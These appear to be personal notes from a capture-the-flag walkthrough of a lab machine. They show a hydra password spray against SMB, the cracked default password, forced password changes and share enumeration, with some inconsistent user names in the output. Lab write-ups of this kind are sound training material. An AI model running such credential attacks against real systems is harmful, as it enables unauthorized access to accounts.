5 spray passwd
# smb doesn't connect
# ldap needs auth
# time to cewl
$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers -w pass.txt
ssh - nothing.
$ hydra -L users -P pass.txt smb://10.10.10.193
[DATA] attacking smb://10.10.10.193:445/
[445][smb] Host: 10.10.10.193 Account: tlavel Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: tlavel password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bnielson Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: bnielson password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bhult Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193 login: bhult password: Fabricorp01
# trying smbclient
$ smbclient -L 10.10.10.193 -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
$ smbclient -L 10.10.10.193 -U bnielson
Enter WORKGROUP\bnielson's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
$ smbclient -L 10.10.10.193 -U bhult
Enter WORKGROUP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
# we need to change password using smbpasswd in kali
$ smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password: kashz
Retype new SMB password: kashz
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria.
# there's a password policy that we need to follow
# changing to Fabricorp02
$ smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password: Fabricorp01
New SMB password: Fabricorp05
Retype new SMB password: Fabricorp05
Password changed for user tlavel
$ smbclient -U tlavel -L //10.10.10.193
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_LOGON_FAILURE
# trying other users
# fails for bhult also
| bnielson works
$ smbclient -U bnielson%Fabricorp05 -L //10.10.10.193
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HP-MFT01 Printer HP-MFT01
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
# after every 1-2 min, password is reset and need to change to a different one as using same gives error
| machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/HP-MFT01
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/SYSVOL
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri May 29 16:29:09 2020
.. D 0 Fri May 29 16:29:09 2020
fabricorp.local Dr 0 Fri May 29 16:29:09 2020
smb: \fabricorp.local\> dir
. D 0 Fri May 29 16:35:39 2020
.. D 0 Fri May 29 16:35:39 2020
DfsrPrivate DHSr 0 Fri May 29 16:35:39 2020
Policies D 0 Fri May 29 16:29:19 2020
scripts D 0 Fri May 29 16:29:09 2020
# cannot view DfsrPrivate
# scripts is empty
# Policies contain policy relatd information
# nothing in smb
Last updated